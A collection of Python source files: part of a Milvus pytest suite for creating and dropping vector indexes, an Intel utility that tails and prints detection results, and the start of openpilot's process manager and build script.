@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition_flush(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_without_connect(self, dis_connect, collection):
"""
target: test create index without connection
method: create collection and add entities in it, check if added successfully
expected: raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.create_index(collection, field_name, default_index)
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, collection, get_simple_index, get_nq):
"""
target: test create index interface, search with more query vectors
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
logging.getLogger().info(connect.describe_index(collection, ""))
nq = get_nq
index_type = get_simple_index["index_type"]
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, default_entities, default_top_k, nq, search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_multithread(self, connect, collection, args):
"""
target: test create index interface with multiprocess
method: create collection and add entities in it, create index
expected: return search success
"""
connect.insert(collection, default_entities)
def build(connect):
connect.create_index(collection, field_name, default_index)
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
threads_num = 8
threads = []
for i in range(threads_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
t = MyThread(target=build, args=(m,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.tags(CaseLabel.L0)
def test_create_index_collection_not_existed(self, connect):
"""
target: test create index interface when collection name not existed
method: create collection and add entities in it, create index
, make sure the collection name not in index
expected: create index failed
"""
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
connect.create_index(collection_name, field_name, default_index)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_insert_flush(self, connect, collection, get_simple_index):
"""
target: test create index
method: create collection and create index, add entities in it
expected: create index ok, and count correct
"""
connect.create_index(collection, field_name, get_simple_index)
result = connect.insert(collection, default_entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_same_index_repeatedly(self, connect, collection, get_simple_index):
"""
target: check if index can be created repeatedly, with the same create_index params
method: create index after index have been built
expected: return code success, and search ok
"""
connect.create_index(collection, field_name, get_simple_index)
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly(self, connect, collection):
"""
target: check if index can be created repeatedly, with the different create_index params
method: create another index with different index_params after index have been built
expected: return code 0, and describe index result equals with the second index params
"""
result = connect.insert(collection, default_entities)
connect.flush([collection])
indexs = [default_index, {"metric_type":"L2", "index_type": "FLAT", "params":{"nlist": 1024}}]
for index in indexs:
connect.create_index(collection, field_name, index)
connect.release_collection(collection)
connect.load_collection(collection)
index = connect.describe_index(collection, "")
assert not index # FLAT is the last index_type, drop all indexes in server
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly_B(self, connect, collection):
"""
target: check if index can be created repeatedly, with the different create_index params
method: create another index with different index_params after index have been built
expected: return code 0, and describe index result equals with the second index params
"""
result = connect.insert(collection, default_entities)
connect.flush([collection])
indexs = [default_index, {"metric_type": "L2", "index_type": "IVF_SQ8", "params": {"nlist": 1024}}]
for index in indexs:
connect.create_index(collection, field_name, index)
connect.release_collection(collection)
connect.load_collection(collection)
index = connect.describe_index(collection, "")
create_target_index(indexs[-1], field_name)
assert index == indexs[-1]
# assert not index # FLAT is the last index_type, drop all indexes in server
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_ip(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors_ip(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition_ip(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition_flush_ip(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors_ip(self, connect, collection, get_simple_index, get_nq):
"""
target: test create index interface, search with more query vectors
method: create collection and add entities in it, create index
expected: return search success
"""
metric_type = "IP"
result = connect.insert(collection, default_entities)
connect.flush([collection])
get_simple_index["metric_type"] = metric_type
connect.create_index(collection, field_name, get_simple_index)
connect.load_collection(collection)
logging.getLogger().info(connect.describe_index(collection, ""))
nq = get_nq
index_type = get_simple_index["index_type"]
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, default_entities, default_top_k, nq, metric_type=metric_type, search_params=search_param)
res = connect.search(collection, query)
assert len(res) == nq
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_multithread_ip(self, connect, collection, args):
"""
target: test create index interface with multiprocess
method: create collection and add entities in it, create index
expected: return search success
"""
connect.insert(collection, default_entities)
def build(connect):
default_index["metric_type"] = "IP"
connect.create_index(collection, field_name, default_index)
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
threads_num = 8
threads = []
for i in range(threads_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
t = MyThread(target=build, args=(m,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_collection_not_existed_ip(self, connect, collection):
"""
target: test create index interface when collection name not existed
method: create collection and add entities in it, create index
, make sure the collection name not in index
expected: return code not equals to 0, create index failed
"""
collection_name = gen_unique_str(uid)
default_index["metric_type"] = "IP"
with pytest.raises(Exception) as e:
connect.create_index(collection_name, field_name, default_index)
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors_insert_ip(self, connect, collection):
"""
target: test create index interface when there is no vectors in collection, and does not affect the subsequent process
method: create collection and add no vectors in it, and then create index, add entities in it
expected: return code equals to 0
"""
default_index["metric_type"] = "IP"
connect.create_index(collection, field_name, default_index)
result = connect.insert(collection, default_entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_same_index_repeatedly_ip(self, connect, collection):
"""
target: check if index can be created repeatedly, with the same create_index params
method: create index after index have been built
expected: return code success, and search ok
"""
default_index["metric_type"] = "IP"
connect.create_index(collection, field_name, default_index)
connect.create_index(collection, field_name, default_index)
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly_ip(self, connect, collection):
"""
target: check if index can be created repeatedly, with the different create_index params
method: create another index with different index_params after index have been built
expected: return code 0, and describe index result equals with the second index params
"""
result = connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb
default_index["metric_type"] = "IP"
indexs = [default_index, {"index_type": "FLAT", "params": {"nlist": 1024}, "metric_type": "IP"}]
for index in indexs:
connect.create_index(collection, field_name, index)
connect.release_collection(collection)
connect.load_collection(collection)
index = connect.describe_index(collection, "")
# assert index == indexs[-1]
assert not index
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_drop_index(self, connect, collection, get_simple_index):
"""
target: test drop index interface
method: create collection and add entities in it, create index, call drop index
expected: return code 0, and default index param
"""
# result = connect.insert(collection, entities)
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
# TODO #7372
def test_drop_index_repeatedly(self, connect, collection, get_simple_index):
"""
target: test drop index repeatedly
method: create index, call drop index, and drop again
expected: return code 0
"""
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_without_connect(self, dis_connect, collection):
"""
target: test drop index without connection
method: drop index, and check if drop successfully
expected: raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L0)
def test_drop_index_collection_not_existed(self, connect):
"""
target: test drop index interface when collection name not existed
method: create collection and add entities in it, create index
, make sure the collection name not in index, and then drop it
expected: return code not equals to 0, drop index failed
"""
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
connect.drop_index(collection_name, field_name)
@pytest.mark.tags(CaseLabel.L0)
def test_drop_index_collection_not_create(self, connect, collection):
"""
target: test drop index interface when index not created
method: create collection and add entities in it, create index
expected: return code not equals to 0, drop index failed
"""
# no create index
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_create_drop_index_repeatedly(self, connect, collection, get_simple_index):
"""
target: test create / drop index repeatedly, use the same index params
method: create index, drop index, four times
expected: return code 0
"""
for i in range(4):
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_ip(self, connect, collection, get_simple_index):
"""
target: test drop index interface
method: create collection and add entities in it, create index, call drop index
expected: return code 0, and default index param
"""
# result = connect.insert(collection, entities)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_repeatedly_ip(self, connect, collection, get_simple_index):
"""
target: test drop index repeatedly
method: create index, call drop index, and drop again
expected: return code 0
"""
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_without_connect_ip(self, dis_connect, collection):
"""
target: test drop index without connection
method: drop index, and check if drop successfully
expected: raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_collection_not_create_ip(self, connect, collection):
"""
target: test drop index interface when index not created
method: create collection and add entities in it, create index
expected: return code not equals to 0, drop index failed
"""
# result = connect.insert(collection, entities)
# no create index
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_create_drop_index_repeatedly_ip(self, connect, collection, get_simple_index):
"""
target: test create / drop index repeatedly, use the same index params
method: create index, drop index, four times
expected: return code 0
"""
get_simple_index["metric_type"] = "IP"
for i in range(4):
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L0)
def test_create_PQ_without_nbits(self, connect, collection):
"""
target: test create PQ index
method: create PQ index without nbits
expected: create successfully
"""
PQ_index = {"index_type": "IVF_PQ", "params": {"nlist": 128, "m": 16}, "metric_type": "L2"}
result = connect.insert(collection, default_entities)
connect.create_index(collection, field_name, PQ_index)
index = connect.describe_index(collection, "")
create_target_index(PQ_index, field_name)
assert index == PQ_index
class TestIndexBinary:
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
if request.param["index_type"] in binary_support():
request.param["metric_type"] = "JACCARD"
return request.param
else:
pytest.skip("Skip index")
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_l2_index(self, request, connect):
request.param["metric_type"] = "L2"
return request.param
@pytest.fixture(
scope="function",
params=[
1,
10,
1111
],
)
def get_nq(self, request):
yield request.param
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, binary_collection, get_jaccard_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(binary_collection, default_binary_entities)
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
binary_index = connect.describe_index(binary_collection, "")
create_target_index(get_jaccard_index, binary_field_name)
assert binary_index == get_jaccard_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition(self, connect, binary_collection, get_jaccard_index):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
binary_index = connect.describe_index(binary_collection, "")
create_target_index(get_jaccard_index, binary_field_name)
assert binary_index == get_jaccard_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, binary_collection, get_jaccard_index, get_nq):
"""
target: test create index interface, search with more query vectors
method: create collection and add entities in it, create index
expected: return search success
"""
nq = get_nq
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
connect.load_collection(binary_collection)
query, vecs = gen_query_vectors(binary_field_name, default_binary_entities, default_top_k, nq, metric_type="JACCARD")
search_param = get_search_param(get_jaccard_index["index_type"], metric_type="JACCARD")
logging.getLogger().info(search_param)
res = connect.search(binary_collection, query, search_params=search_param)
assert len(res) == nq
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_invalid_metric_type_binary(self, connect, binary_collection, get_l2_index):
"""
target: test create index interface with invalid metric type
method: add entities into binary collection, flush, create index with L2 metric type.
expected: return create_index failure
"""
# insert 6000 vectors
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
with pytest.raises(Exception) as e:
res = connect.create_index(binary_collection, binary_field_name, get_l2_index)
"""
******************************************************************
The following cases are used to test `describe_index` function
***************************************************************
"""
@pytest.mark.skip("repeat with test_create_index binary")
def _test_get_index_info(self, connect, binary_collection, get_jaccard_index):
"""
target: test describe index interface
method: create collection and add entities in it, create index, call describe index
expected: return code 0, and index instructure
"""
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
assert stats["row_count"] == default_nb
for partition in stats["partitions"]:
segments = partition["segments"]
if segments:
for segment in segments:
for file in segment["files"]:
if "index_type" in file:
assert file["index_type"] == get_jaccard_index["index_type"]
@pytest.mark.skip("repeat with test_create_index_partition binary")
def _test_get_index_info_partition(self, connect, binary_collection, get_jaccard_index):
"""
target: test describe index interface
method: create collection, create partition and add entities in it, create index, call describe index
expected: return code 0, and index instructure
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
logging.getLogger().info(stats)
assert stats["row_count"] == default_nb
assert len(stats["partitions"]) == 2
for partition in stats["partitions"]:
segments = partition["segments"]
if segments:
for segment in segments:
for file in segment["files"]:
if "index_type" in file:
assert file["index_type"] == get_jaccard_index["index_type"]
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index(self, connect, binary_collection, get_jaccard_index):
"""
target: test drop index interface
method: create collection and add entities in it, create index, call drop index
expected: return code 0, and default index param
"""
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
logging.getLogger().info(stats)
connect.drop_index(binary_collection, binary_field_name)
binary_index = connect.describe_index(binary_collection, "")
assert not binary_index
@pytest.mark.tags(CaseLabel.L0)
def test_drop_index_partition(self, connect, binary_collection, get_jaccard_index):
"""
target: test drop index interface
method: create collection, create partition and add entities in it, create index on collection, call drop collection index
expected: return code 0, and default index param
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
connect.drop_index(binary_collection, binary_field_name)
binary_index = connect.describe_index(binary_collection, "")
assert not binary_index
class TestIndexInvalid(object):
"""
Test create / describe / drop index interfaces with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_create_index_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test create index interface for invalid scenario
method: create index with invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.create_index(collection_name, field_name, default_index)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test drop index interface for invalid scenario
method: drop index with invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.drop_index(collection_name)
@pytest.fixture(
scope="function",
params=gen_invalid_index()
)
def get_index(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_with_invalid_index_params(self, connect, collection, get_index):
"""
target: test create index interface for invalid scenario
method: create index with invalid index params
expected: raise exception
"""
logging.getLogger().info(get_index)
with pytest.raises(Exception) as e:
connect.create_index(collection, field_name, get_index)
class TestIndexAsync:
@pytest.fixture(scope="function", autouse=True)
def skip_http_check(self, args):
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
def check_result(self, res):
logging.getLogger().info("In callback check search result")
logging.getLogger().info(res)
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
logging.getLogger().info("start index")
future = connect.create_index(collection, field_name, get_simple_index, _async=True)
logging.getLogger().info("before result")
res = future.result()
# TODO:
logging.getLogger().info(res)
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_drop(self, connect, collection):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
connect.create_index(collection, field_name, default_index, _async=True)
connect.drop_collection(collection)
with pytest.raises(Exception, match=f'DescribeIndex failed, error = collection {collection} not found'):
connect.describe_index(collection, "")
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_with_invalid_collection_name(self, connect):
collection_name = " "
with pytest.raises(Exception) as e:
future = connect.create_index(collection_name, field_name, default_index, _async=True)
res = future.result()
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_callback(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
logging.getLogger().info("start index")
future = connect.create_index(collection, field_name, get_simple_index, _async=True,
_callback=self.check_result)
logging.getLogger().info("before result")
res = future.result()
# TODO:
logging.getLogger().info(res)
|
results_watcher.py
|
#!/usr/bin/python3
'''
* Copyright (C) 2019-2020 Intel Corporation.
*
* SPDX-License-Identifier: BSD-3-Clause
'''
import json
import time
from threading import Thread
WATCHER_POLL_TIME = 0.01
class ResultsWatcher:
def __init__(self, filename, sleep_time=WATCHER_POLL_TIME):
self.filename = filename
self.sleep_time = sleep_time
self.watcher_thread = None
self.trigger_stop = False
self.error_message = None
def watch(self):
self.watcher_thread = Thread(target=self.watch_method)
self.trigger_stop = False
self.watcher_thread.start()
def stop(self):
self.trigger_stop = True
self.watcher_thread.join()
if self.error_message:
raise OSError(self.error_message)
def watch_method(self):
try:
with open(self.filename, 'r') as file:
while not self.trigger_stop:
where = file.tell()
line = file.readline()
if not line:
time.sleep(self.sleep_time)
file.seek(where)
else:
try:
ResultsWatcher.print_results(json.loads(line))
except ValueError:
pass
except OSError:
self.error_message = "Unable to read from destination metadata file {}".format(self.filename)
# Print Functions
@classmethod
def print_results(cls, results):
object_output = []
for detected_object in results.get("objects", []):
ResultsWatcher.process_detections(detected_object, object_output)
event_output = []
for event in results.get("events", []):
current_event = []
for key in event:
current_event.append("{}: {}".format(key, event[key]))
if current_event:
event_output.append("Event: {}".format(", ".join(current_event)))
if "timestamp" in results and (object_output or event_output):
print("Timestamp {}".format(results["timestamp"]))
if object_output:
print("{}".format("\n".join(object_output)))
if event_output:
print("{}".format("\n".join(event_output)))
@staticmethod
def process_detections(detected_object, object_output):
meta = {}
current_object = []
for key in detected_object:
if key == "detection":
confidence = detected_object[key]["confidence"]
label = detected_object[key]["label"]
bbox = detected_object[key]["bounding_box"]
current_object.append(label)
current_object.append("({:.2f})".format(confidence))
current_object.append("[{:.2f}, {:.2f}, {:.2f}, {:.2f}]"
.format(bbox["x_min"],
bbox["y_min"],
bbox["x_max"],
bbox["y_max"]))
elif key == "id":
meta[key] = detected_object[key]
elif isinstance(detected_object[key], dict) and "label" in detected_object[key]:
meta[key] = detected_object[key]["label"]
elif key == "tensors":
for tensor in detected_object[key]:
if "name" in tensor and tensor["name"] == "action":
confidence = tensor["confidence"]
label = tensor["label"]
current_object.append(label)
current_object.append("({:.2f})".format(confidence))
if meta:
current_object.append(str(meta))
if current_object:
object_output.append("- {}".format(" ".join(current_object)))
|
manager.py
|
#!/usr/bin/env python3
import datetime
import importlib
import os
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import textwrap
import time
import traceback
from multiprocessing import Process
from typing import Dict
from common.basedir import BASEDIR
from common.spinner import Spinner
from common.text_window import TextWindow
import selfdrive.crash as crash
from selfdrive.hardware import HARDWARE, EON, PC, TICI
from selfdrive.hardware.eon.apk import update_apks, pm_apply_packages, start_offroad
from selfdrive.swaglog import cloudlog, add_logentries_handler
from selfdrive.version import version, dirty
os.environ['BASEDIR'] = BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
TOTAL_SCONS_NODES = 1225
MAX_BUILD_PROGRESS = 70
WEBCAM = os.getenv("WEBCAM") is not None
PREBUILT = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL, fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
# whose low byte is the signal number and whose high byte is the exit satus
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
# Start spinner
spinner = Spinner()
spinner.update_progress(0, 100)
if __name__ != "__main__":
spinner.close()
def build():
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else f"-j{nproc - 1}"
for retry in [True, False]:
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline()
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
spinner.update_progress(MAX_BUILD_PROGRESS * min(1., i / TOTAL_SCONS_NODES), 100.)
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n')
compile_output += r
if retry and (not dirty):
if not os.getenv("CI"):
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache", ignore_errors=True)
shutil.rmtree("/data/scons_cache", ignore_errors=True)
else:
print("scons build failed after retry")
sys.exit(1)
else:
# Build failed log errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
spinner.close()
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("openpilot failed to build\n \n" + error_s) as t:
t.wait_for_exit()
exit(1)
else:
break
if __name__ == "__main__" and not PREBUILT:
build()
import cereal.messaging as messaging
from cereal import log
from common.params import Params
from selfdrive.registration import register
from selfdrive.launcher import launcher
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.monitoring.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"rtshield": "selfdrive.rtshield",
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
